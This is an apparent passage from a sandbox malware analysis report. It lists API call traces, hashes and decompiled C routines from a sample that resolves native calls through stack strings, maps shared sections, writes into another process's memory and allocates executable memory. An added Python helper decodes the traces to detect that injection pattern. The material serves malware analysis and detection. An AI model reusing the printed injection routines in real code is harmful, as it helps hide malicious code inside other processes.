                                                                                                                                          • Part of subcall function 004450BE: OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
                                                                                                                                          • Part of subcall function 004450BE: IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
                                                                                                                                          • Part of subcall function 004450BE: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1973333951-0
                                                                                                                                        • Opcode ID: 99beeecffebd8d466ba2134cab138459088e173c70e85b4971d5f94770e3c5f1
                                                                                                                                        • Instruction ID: 52708ad5d67f04504d600ebd2d7d4c46a325d3e604a97bd8a676fdec3abeac23
                                                                                                                                        • Opcode Fuzzy Hash: 99beeecffebd8d466ba2134cab138459088e173c70e85b4971d5f94770e3c5f1
                                                                                                                                        • Instruction Fuzzy Hash: 2F310535A00118EFEB21EF79DC85A6F77B8EB41744B10453AE501EB211EBB88D00DB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$AllocateLastMemoryStatusVirtual
                                                                                                                                        • String ID: [uE$[uE
                                                                                                                                        • API String ID: 722216270-1812326636
                                                                                                                                        • Opcode ID: e42e6ca9023417a33f769f6ac14efffa1655f147ec5398583f572d96b3ced444
                                                                                                                                        • Instruction ID: b40c97280bddd0fae74faae04d22f2a10ffc4a5b42805f2c99f5b3394e3d3cba
                                                                                                                                        • Opcode Fuzzy Hash: e42e6ca9023417a33f769f6ac14efffa1655f147ec5398583f572d96b3ced444
                                                                                                                                        • Instruction Fuzzy Hash: 54F05E71910309FBEB05DB94DD19BDE77BCEB04309F100058E201A6080EBB8AB04CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 0045626C
                                                                                                                                          • Part of subcall function 0046345F: NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
                                                                                                                                        • memset.NTDLL ref: 00456290
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                        • Opcode ID: 672d55a76be78c931a36429570adf0dda9075a73d5d6f688c06625c2393fd433
                                                                                                                                        • Instruction ID: 5a3ac7ffcfad486a80420f9d295f37459ab3c7f76a68993a2b91fff0e83e949b
                                                                                                                                        • Opcode Fuzzy Hash: 672d55a76be78c931a36429570adf0dda9075a73d5d6f688c06625c2393fd433
                                                                                                                                        • Instruction Fuzzy Hash: A2216F71D00209AFCB01DFA9C8809EEFBF9FF08314F10456AE615F3210D774AA488B65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%
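Reading the raw API traces in these function blocks by hand is slow, so here is an added analyst helper, written for this report and not part of the Joe Sandbox output or of the sample's own code. It parses trace lines in exactly the format shown above, decodes the 32-bit immediates handed to GetModuleHandleA/GetProcAddress as little-endian stack-string fragments (0x4C44544E is "NTDL", 0x7243775A is "ZwCr", 0x614D775A is "ZwMa", 0x6E55775A is "ZwUn", 0x4E6C7452 is "RtlN", 0x6C43775A is "ZwCl"), names the flag arguments of NtCreateSection and NtAllocateVirtualMemory using standard Windows SDK constants, and reports whether the trace contains the NtCreateSection/NtMapViewOfSection pair that this family uses to push code into another process. The embedded trace lines are copied from the blocks above; the "all four bytes printable" rule for recognising a stack string is an assumption of this script, chosen because return addresses and flag words fail it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: API-trace lines copied verbatim from the function blocks of this report.
TRACE = """\
• memcpy.NTDLL(?,00457ED5,00000800,?,?,00000000,74B05520), ref: 00441F5A
  • Part of subcall function 00442710: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00000000,?,?,?,?,00441E28,?,?,?,00000000,74B05520), ref: 00442735
  • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00442757
  • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0044276D
  • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00442783
  • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00442799
  • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 004427AF
• NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,74B05520), ref: 00441F98
• memset.NTDLL ref: 00441FDA
• NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
• NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 0045626C
  • Part of subcall function 0046345F: NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
"""

# One trace line: optional "Part of subcall function X:" prefix, API.MODULE, optional (args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Standard Windows constants (SDK values), used to label the interesting arguments.
SECTION_ACCESS = {0xF001F: "SECTION_ALL_ACCESS"}
SEC_ATTRS = {0x8000000: "SEC_COMMIT", 0x1000000: "SEC_IMAGE", 0x4000000: "SEC_RESERVE"}
MEM_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int] = None


def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def as_int(arg):
    """Arguments are 8 hex digits; '?' and garbled text such as '[uE' come back as None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def stack_string(arg):
    """Decode a 32-bit immediate as four little-endian bytes if every byte is printable ASCII.
    Heuristic (assumption): code addresses and flag words contain NUL or high bytes and are rejected."""
    v = as_int(arg)
    if v is None:
        return None
    raw = v.to_bytes(4, "little")
    return raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None


def resolve_imports(calls):
    """Pair each GetModuleHandleA/GetProcAddress call with the stack-string fragment it was given."""
    out = []
    for c in calls:
        if c.api in ("GetModuleHandleA", "GetProcAddress"):
            idx = 0 if c.api == "GetModuleHandleA" else 1   # lpModuleName vs. lpProcName
            frag = stack_string(c.args[idx]) if len(c.args) > idx else None
            if frag:
                out.append((c.api, frag))
    return out


def bits(value, table):
    return [name for bit, name in table.items() if value & bit == bit]


def decode_flags(call):
    """Name the flag arguments of the section and allocation syscalls (positions per the NT prototypes)."""
    a = [as_int(x) for x in call.args]
    get = lambda i: a[i] if i < len(a) and a[i] is not None else 0
    if call.api == "NtCreateSection":
        return {"DesiredAccess": bits(get(1), SECTION_ACCESS),
                "AllocationAttributes": bits(get(5), SEC_ATTRS)}
    if call.api == "NtAllocateVirtualMemory":
        return {"AllocationType": bits(get(4), MEM_TYPES),
                "Protect": PAGE_PROT.get(get(5), "unknown")}
    return {}


def section_injection(calls):
    """True when the trace shows the create-section + map-view pair used for cross-process injection."""
    apis = {c.api for c in calls}
    return "NtCreateSection" in apis and "NtMapViewOfSection" in apis


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for api, frag in resolve_imports(calls):
        print(f"{api:18s} <- stack-string fragment {frag!r}")
    for c in calls:
        if (flags := decode_flags(c)):
            print(f"{c.api} @ {c.ref:08X}: {flags}")
    print("section-mapping injection pattern:", section_injection(calls))
```

Run it as-is to see the six resolved fragments (NTDLL, ZwCreateSection, ZwMapViewOfSection, ZwUnmapViewOfSection, RtlNtStatusToDosError, ZwClose, matching the native calls listed in these blocks), the SECTION_ALL_ACCESS/SEC_COMMIT section and the MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE allocation. Paste further "• API.MODULE(...), ref:" lines from the report into TRACE to extend it.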

                                                                                                                                         C-Code - Quality: 72%
                                                                                                                                         			// Creates a pagefile-backed section of the size requested in the caller's context struct
                                                                                                                                         			// (EAX: +4 size, +8 page protection, +0x18 and +0x1c function pointers) and hands the
                                                                                                                                         			// mapped view back through _a4. Comments added by the editor; code is the report's decompilation.
                                                                                                                                         			E73751CEF(intOrPtr* __eax, void** _a4) {
                                                                                                                                         				int _v12;            // mapped view base, filled in by E73751880
                                                                                                                                         				void* _v16;          // section handle
                                                                                                                                         				void* _v20;
                                                                                                                                         				void* _v24;          // MaximumSize (low dword), taken from context +4
                                                                                                                                         				int _v28;            // OBJECT_ATTRIBUTES.SecurityQualityOfService
                                                                                                                                         				int _v32;            // OBJECT_ATTRIBUTES.SecurityDescriptor
                                                                                                                                         				intOrPtr _v36;       // OBJECT_ATTRIBUTES.Attributes
                                                                                                                                         				int _v40;            // OBJECT_ATTRIBUTES.ObjectName
                                                                                                                                         				int _v44;            // OBJECT_ATTRIBUTES.RootDirectory
                                                                                                                                         				void* _v48;          // OBJECT_ATTRIBUTES.Length
                                                                                                                                         				void* __esi;
                                                                                                                                         				long _t34;           // NTSTATUS from NtCreateSection
                                                                                                                                         				void* _t39;
                                                                                                                                         				void* _t47;          // return value
                                                                                                                                         				intOrPtr* _t48;      // context struct
                                                                                                                                         
                                                                                                                                         				_t48 = __eax;
                                                                                                                                         				// six dword stores through EDI; the decompiler did not recover the destination
                                                                                                                                         				asm("stosd");
                                                                                                                                         				asm("stosd");
                                                                                                                                         				asm("stosd");
                                                                                                                                         				asm("stosd");
                                                                                                                                         				asm("stosd");
                                                                                                                                         				asm("stosd");
                                                                                                                                         				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                         				_v16 = 0;
                                                                                                                                         				_v12 = 0;
                                                                                                                                         				_v48 = 0x18;         // sizeof(OBJECT_ATTRIBUTES) on 32-bit
                                                                                                                                         				_v44 = 0;
                                                                                                                                         				_v36 = 0x40;         // OBJ_CASE_INSENSITIVE
                                                                                                                                         				_v40 = 0;            // no name: anonymous section
                                                                                                                                         				_v32 = 0;
                                                                                                                                         				_v28 = 0;
                                                                                                                                         				// NtCreateSection(&SectionHandle, SECTION_ALL_ACCESS (0xF001F), &ObjectAttributes, &MaximumSize,
                                                                                                                                         				//                 SectionPageProtection from context +8, SEC_COMMIT (0x8000000), FileHandle = NULL)
                                                                                                                                         				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                         				if(_t34 < 0) {       // NTSTATUS failure: pass the status to the context's +0x18 routine
                                                                                                                                         					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                         				} else {
                                                                                                                                         					 *_t48 = _v16;   // store the section handle at context +0
                                                                                                                                         					_t39 = E73751880(_t48,  &_v12); // executed  -- maps the section (NtMapViewOfSection, see the subcall below)
                                                                                                                                         					_t47 = _t39;
                                                                                                                                         					if(_t47 != 0) {  // mapping failed: the context's +0x1c routine receives the section handle
                                                                                                                                         						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                         					} else {
                                                                                                                                         						memset(_v12, 0, _v24);   // zero the fresh view, length = MaximumSize low dword
                                                                                                                                         						 *_a4 = _v12;            // return the view base to the caller
                                                                                                                                         					}
                                                                                                                                         				}
                                                                                                                                         				return _t47;
                                                                                                                                         			}
                                                                                                                                         
                                                                                                                                         Instruction addresses of the statements above (the report's per-line address column, spilled into a separate list by extraction): 0x73751cf8, 0x73751cff, 0x73751d00, 0x73751d01, 0x73751d02, 0x73751d03, 0x73751d14, 0x73751d18, 0x73751d2c, 0x73751d2f, 0x73751d32, 0x73751d39, 0x73751d3c, 0x73751d43, 0x73751d46, 0x73751d49, 0x73751d4c, 0x73751d51, 0x73751d8c, 0x73751d53, 0x73751d56, 0x73751d5c, 0x73751d61, 0x73751d65, 0x73751d83, 0x73751d67, 0x73751d6e, 0x73751d7c, 0x73751d7c, 0x73751d65, 0x73751d94

                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 73751D4C
                                                                                                                                          • Part of subcall function 73751880: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,73751D61,00000002,00000000,?,?,00000000,?,?,73751D61,?), ref: 737518AD
                                                                                                                                        • memset.NTDLL ref: 73751D6E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                        • Opcode ID: 5f1105f09404ad2eb7a73370a959e72865a0610fd00d8de07a1f287c8e034285
                                                                                                                                        • Instruction ID: 07ec83a801b03c772f5abafffde8c073881c6beb616071098c900aa1851acfa8
                                                                                                                                        • Opcode Fuzzy Hash: 5f1105f09404ad2eb7a73370a959e72865a0610fd00d8de07a1f287c8e034285
                                                                                                                                        • Instruction Fuzzy Hash: EE2108B2D0020DAFDB11DFA9C984ADEFBB9EF48355F104529E605F3610D735AA448BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(6F57775A,00000318), ref: 0046257C
                                                                                                                                        • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00462598
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044C536: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
                                                                                                                                          • Part of subcall function 0044C536: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
                                                                                                                                        • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00462702
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3547194813-0
                                                                                                                                        • Opcode ID: 85f169a6a578f664670f57c9946d477c00f360e83e47712cd13f4647a648f5c7
                                                                                                                                        • Instruction ID: 55234ba3fdd1df2b01efd5f9dbfb2b457cdf4ac322d02dcdaefffe76ca208f80
                                                                                                                                        • Opcode Fuzzy Hash: 85f169a6a578f664670f57c9946d477c00f360e83e47712cd13f4647a648f5c7
                                                                                                                                        • Instruction Fuzzy Hash: DA616D70A0060AAFDB14DFA5C980BAEB7B4FF08305F04416AE904E7351EB74E955CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00446839
                                                                                                                                        • GetProcAddress.KERNEL32(6F57775A), ref: 00446861
                                                                                                                                        • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 0044687F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressInformationProcProcess64QueryWow64memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2968673968-0
                                                                                                                                        • Opcode ID: c6ed1619e1cb165a5476ab0c0a7809d9499f0ffa9b2facc1a8cb74150cca79f1
                                                                                                                                        • Instruction ID: 80b86039b49fa7ca95fdc9fa05d762195bafdf316b3416088b620b7a40c8f55b
                                                                                                                                        • Opcode Fuzzy Hash: c6ed1619e1cb165a5476ab0c0a7809d9499f0ffa9b2facc1a8cb74150cca79f1
                                                                                                                                        • Instruction Fuzzy Hash: A6117375A01118AFFB10DB95DC49F9E77B9BB45704F05002AF908E7290E7B4ED05CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,004575FD,00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?), ref: 00453A95
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00453AA4
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?,?,00000318,00000008), ref: 00453AAB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$LastMemoryStatusVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1089604434-0
                                                                                                                                        • Opcode ID: d2b2101ea97f5bb263036503ee92431d1c8b67d7bc047f9df71242f237589055
                                                                                                                                        • Instruction ID: 5d5196aa574aed6921f266dba8db8f53fd219c981c690e4e5fd9764a657efda5
                                                                                                                                        • Opcode Fuzzy Hash: d2b2101ea97f5bb263036503ee92431d1c8b67d7bc047f9df71242f237589055
                                                                                                                                        • Instruction Fuzzy Hash: 58E0483360021AABCF115FE9DD14D9B7B59FB08786B004025FE41D2121D775CD219BE5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E737519DA(void* __ecx) {
                                                                                                                                        				char _v8;
                                                                                                                                        				signed short _t7;
                                                                                                                                        
                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                        				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                        					__imp__GetSystemDefaultUILanguage();
                                                                                                                                        					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                        				}
                                                                                                                                        				return _v8;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 737519EF
                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 737519F9
                                                                                                                                        • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 73751A0C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3724080410-0
                                                                                                                                        • Opcode ID: 5c4f06e5478c6bcad7b5ea7c3ce80ac124279bc5e41b9806b1418247b5020eab
                                                                                                                                        • Instruction ID: e76f3bf4dec4451c30b49b3357e90fc4289cb0401075ea95593837f98a739e9c
                                                                                                                                        • Opcode Fuzzy Hash: 5c4f06e5478c6bcad7b5ea7c3ce80ac124279bc5e41b9806b1418247b5020eab
                                                                                                                                        • Instruction Fuzzy Hash: 50E04F6568030DB6FB04E7919E0ABBD73BCAB0070AF500044BB45EA0C0D6B89A04AA65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E737515AB(void* __eax, void* __edx) {
                                                                                                                                        				char _v8;
                                                                                                                                        				void** _v12;
                                                                                                                                        				void* _t17;
                                                                                                                                        				long _t23;
                                                                                                                                        				long _t25;
                                                                                                                                        				long _t28;
                                                                                                                                        				void* _t31;
                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                        				void* _t35;
                                                                                                                                        				void** _t36;
                                                                                                                                        				intOrPtr _t38;
                                                                                                                                        
                                                                                                                                        				_t31 = __edx;
                                                                                                                                        				_t35 = __eax;
                                                                                                                                        				_t17 = E73751779( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                        					_t28 = 8;
                                                                                                                                        					goto L8;
                                                                                                                                        				} else {
                                                                                                                                        					_t34 = _v8;
                                                                                                                                        					_t28 = E737518D7( &_v8, _t34, _t35);
                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                        						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
                                                                                                                                        						_t23 = E73751BCD(_t34, _t38); // executed
                                                                                                                                        						_t28 = _t23;
                                                                                                                                        						if(_t28 == 0) {
                                                                                                                                        							_t25 = E73751EDE(_t38, _t31, _t34); // executed
                                                                                                                                        							_t28 = _t25;
                                                                                                                                        							if(_t28 == 0) {
                                                                                                                                        								_push(_t25);
                                                                                                                                        								_push(1);
                                                                                                                                        								_push(_t34);
                                                                                                                                        								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
                                                                                                                                        									_t28 = GetLastError();
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_t36 = _v12;
                                                                                                                                        					_t36[6](NtClose( *_t36));
                                                                                                                                        					E737514B6(_t36);
                                                                                                                                        					L8:
                                                                                                                                        					return _t28;
                                                                                                                                        				}
                                                                                                                                        			}

APIs
  • Part of subcall function 73751779: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,737515D5,?,?,?,00000002,?,?,?), ref: 7375179E
  • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517C0
  • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517D6
  • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517EC
  • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 73751802
  • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 73751818
  • Part of subcall function 737518D7: memcpy.NTDLL(?,00000002,737515E3,?,0000000A,?,?,?,737515E3,?,0000000A,?,?,?,00000002), ref: 73751904
  • Part of subcall function 737518D7: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 73751937
• NtClose.NTDLL(?,?,0000000A,?,?,?,00000002,?,?,?,?), ref: 73751625
  • Part of subcall function 73751BCD: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 73751C03
  • Part of subcall function 73751BCD: lstrlenA.KERNEL32(00000002), ref: 73751C19
  • Part of subcall function 73751BCD: memset.NTDLL ref: 73751C23
  • Part of subcall function 73751BCD: GetProcAddress.KERNEL32(?,00000002), ref: 73751C86
  • Part of subcall function 73751BCD: lstrlenA.KERNEL32(-00000002), ref: 73751C9B
  • Part of subcall function 73751BCD: memset.NTDLL ref: 73751CA5
  • Part of subcall function 73751EDE: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 73751F0C
  • Part of subcall function 73751EDE: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 73751F63
  • Part of subcall function 73751EDE: GetLastError.KERNEL32(?,?), ref: 73751F69
• GetLastError.KERNEL32(?,?,?,?), ref: 73751618
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
• String ID:
• API String ID: 2954739140-0
• Opcode ID: 3a48f309f889a32652bcc43f59fb08139e78e7765502d2b764618596080922a1
• Instruction ID: e4699f95f2d3ca5d3f33829446652b39e4de70c7ab0eea7c0ac4d8863ffc8c7a
• Opcode Fuzzy Hash: 3a48f309f889a32652bcc43f59fb08139e78e7765502d2b764618596080922a1
• Instruction Fuzzy Hash: 29110C736017156BEB25ABE98D88F9B77BCEF44255F080168F902D3240EFA5EC0587A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
• NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AddressMemory64ProcReadVirtualWow64
• String ID:
• API String ID: 752694512-0
• Opcode ID: 236c73407b54c4d6a08c62347a760a1906ac6f96b72a1385801cc300d2b59398
• Instruction ID: 9d427eeaf3f71052856635d3a2b09bee3d004151b221b6f6870e8f5d611b0320
• Opcode Fuzzy Hash: 236c73407b54c4d6a08c62347a760a1906ac6f96b72a1385801cc300d2b59398
• Instruction Fuzzy Hash: AFF03776101105BB9B018F96DC84C9EBBFAEB84740B04406AF505C2230E6B1E951DF28
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 68%
E73751880(void** __esi, PVOID* _a4) {
	long _v8;
	void* _v12;
	void* _v16;
	long _t13;

	_v16 = 0;
	asm("stosd");
	_v8 = 0;
	_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
	if(_t13 < 0) {
		_push(_t13);
		return __esi[6]();
	}
	return 0;
}

APIs
• NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,73751D61,00000002,00000000,?,?,00000000,?,?,73751D61,?), ref: 737518AD
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: SectionView
• String ID:
• API String ID: 1323581903-0
• Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
• Instruction ID: 2d3a7ac6fd2c0f479eb59037ed09885498a31a3fe2b0f309640567edb28a9570
• Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
• Instruction Fuzzy Hash: DBF037B590020CFFEB119FA5CD85D9FBBBDEB44365B104E39F552E2190D630AE089B60
Uniqueness
Uniqueness Score: -1.00%

APIs
